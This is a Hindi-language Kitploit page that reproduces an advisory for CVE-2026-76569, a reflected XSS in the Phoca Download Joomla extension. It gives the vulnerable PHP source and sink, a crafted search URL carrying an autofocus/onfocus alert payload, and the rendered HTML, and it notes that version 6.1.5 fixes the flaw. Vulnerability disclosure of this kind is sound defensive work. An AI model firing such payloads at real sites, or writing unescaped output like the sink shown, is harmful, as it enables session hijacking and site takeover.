Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-76569 — फोका डाउनलोड में खोज GET पैरामीटर के माध्यम से रिफ्लेक्टेड XSS | Kitploit
उपकरण/GitHubGitHub/toanln-cov/cve-2026-76569
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubtoanln-cov/cve-2026-76569

CVE-2026-76569

फोका डाउनलोड में खोज GET पैरामीटर के माध्यम से रिफ्लेक्टेड XSS

रिपॉजिटरी देखें
17घं 9मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Phoca Download में खोज GET पैरामीटर के माध्यम से Reflected XSS

Phoca Download ≤ 6.1.4 — प्रमाणित हमलावर उपयोगकर्ता नियंत्रण कक्ष में तैयार किए गए खोज URL के माध्यम से मनमाना JavaScript निष्पादित करता है

CVE CVSS v4.0 CWE-79 Affected Researcher


सारांश

Joomla के लिए Phoca Download (com_phocadownload) में उपयोगकर्ता नियंत्रण कक्ष की फ़ाइल खोज कार्यक्षमता में एक reflected Cross-Site Scripting (XSS) भेद्यता मौजूद है। search GET पैरामीटर को Joomla के 'string' फ़िल्टर के साथ संसाधित किया जाता है — जो केवल को कॉल करता है और वर्ण को संरक्षित रखता है — फिर इसे के बिना एक HTML विशेषता में प्रतिध्वनित किया जाता है। एक हमलावर मनमाने HTML विशेषताओं और इवेंट हैंडलर को इंजेक्ट कर सकता है जो पृष्ठ लोड होने पर पीड़ित के ब्राउज़र में निष्पादित होते हैं, बिना तैयार किए गए लिंक पर क्लिक करने के अलावा किसी उपयोगकर्ता इंटरैक्शन की आवश्यकता के।

strip_tags()
"
htmlspecialchars()
<input value="">

प्रभावित संस्करण

COMPONENTVULNERABLETESTED ONFIXED
com_phocadownload≤ 6.1.4Joomla 5 + PhocaDownload 6.1.4 + MariaDB 10.66.1.5

भेद्यता विवरण

प्रकार: Reflected Cross-Site Scripting (CWE-79) प्रमाणीकरण आवश्यक: पंजीकृत Joomla उपयोगकर्ता (लॉग इन) + उपयोगकर्ता नियंत्रण कक्ष सक्षम (enable_user_cp = 1) CSRF टोकन आवश्यक: आवश्यक नहीं — GET अनुरोध, इस पथ पर कोई CSRF टोकन जाँच नहीं Sink फ़ाइल: site/views/user/tmpl/default_files_bootstrap.php

मूल कारण

search पैरामीटर को Joomla के 'string' फ़िल्टर का उपयोग करके पढ़ा जाता है, जो केवल strip_tags() को कॉल करता है। यह " वर्ण को संरक्षित रखता है, जिससे हमलावर value="" विशेषता संदर्भ से बाहर निकलकर मनमाने HTML विशेषताओं को इंजेक्ट कर सकता है।

SITE/VIEWS/USER/VIEW.HTML.PHP:252 — SOURCE

root@kitploit:~
$search_files = $app->getUserStateFromRequest(
    $this->_context_files.'.search', 'search', '', 'string'
);
$search_files = StringHelper::strtolower($search_files);
$lists_files['search'] = $search_files;  // stored without encoding

SITE/VIEWS/USER/TMPL/DEFAULT_FILES_BOOTSTRAP.PHP:56 — SINK (VULNERABLE)

root@kitploit:~
<input type="text" name="search" id="pdsearch"
    value="<?php echo $this->t['listsfiles']['search'];?>"
    class="form-control" />

सहोदर दृश्य phocadownloadlinkfile (समान एक्सटेंशन) समान खोज फ़ील्ड के लिए PhocaDownloadUtils::filterValue($search, 'text') — जो htmlspecialchars() के समतुल्य है — सही ढंग से लागू करता है। user दृश्य समान सुरक्षा लागू नहीं करता है, जो एक्सटेंशन के भीतर असंगत आउटपुट एन्कोडिंग का संकेत देता है।


प्रूफ ऑफ कॉन्सेप्ट

1. पंजीकृत उपयोगकर्ता के रूप में लॉग इन करें

Joomla लॉगिन पृष्ठ पर नेविगेट करें और पंजीकृत उपयोगकर्ता के रूप में प्रमाणित करें। सफल लॉगिन के बाद, Joomla उपयोगकर्ता प्रोफ़ाइल पृष्ठ पर पुनर्निर्देशित करता है, जो एक सक्रिय सत्र की पुष्टि करता है।

testuser के रूप में सफल लॉगिन — प्रोफ़ाइल पृष्ठ पर पुनर्निर्देशित

2. उपयोगकर्ता नियंत्रण कक्ष तक पहुँचें (बेसलाइन)

PhocaDownload उपयोगकर्ता नियंत्रण कक्ष पर नेविगेट करें:

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user

पृष्ठ एक खाली खोज फ़ील्ड (value="") के साथ प्रस्तुत होता है। इंजेक्शन से पहले यह सामान्य स्थिति है।

उपयोगकर्ता नियंत्रण कक्ष — खाली खोज फ़ील्ड, बेसलाइन स्थिति

3. XSS पेलोड के साथ तैयार URL सबमिट करें

निम्नलिखित तैयार URL पर नेविगेट करें (या कच्चे पेलोड को सीधे खोज बॉक्स में टाइप करें):

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user&search=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%20x%3D

XSS पेलोड के साथ तैयार URL खोज पैरामीटर में सबमिट किया गया

जैसे ही पृष्ठ लोड होता है, इंजेक्ट किया गया autofocus विशेषता इनपुट तत्व पर फोकस करता है, तुरंत onfocus इवेंट हैंडलर को ट्रिगर करता है। किसी और उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं है।

प्रस्तुत HTML (भेद्य):

root@kitploit:~
<input type="text" name="search" id="pdsearch"
  value="" autofocus onfocus=alert(document.domain) x="
  class="form-control" />

प्रभाव

  1. सत्र अपहरण — एक हमलावर document.cookie के माध्यम से पीड़ित के Joomla सत्र कुकी को चुरा सकता है, जिससे बिना क्रेडेंशियल के पूर्ण खाता अधिग्रहण संभव हो जाता है।
  2. मनमाना JavaScript निष्पादन — कोई भी JavaScript पीड़ित के ब्राउज़र सत्र में निष्पादित होता है — कीलॉगिंग, DOM हेरफेर, क्रेडेंशियल संग्रह, और फ़िशिंग पृष्ठों पर पुनर्निर्देशन सभी संभव हैं।
  3. विशेषाधिकार वृद्धि — यदि कोई व्यवस्थापक प्रमाणित होने के दौरान तैयार लिंक पर क्लिक करता है, तो हमलावर को व्यवस्थापक-स्तरीय JavaScript निष्पादन प्राप्त होता है, जो संभावित रूप से व्यवस्थापकीय पैनल क्रियाओं के माध्यम से पूर्ण साइट समझौता सक्षम करता है।

संदर्भ

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76569
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76569
  • GitHub Advisory: https://github.com/advisories/GHSA-99wr-9r6w-w242
  • Vendor Repository: https://github.com/PhocaDesign/PhocaDownload
टूल डाउनलोड करें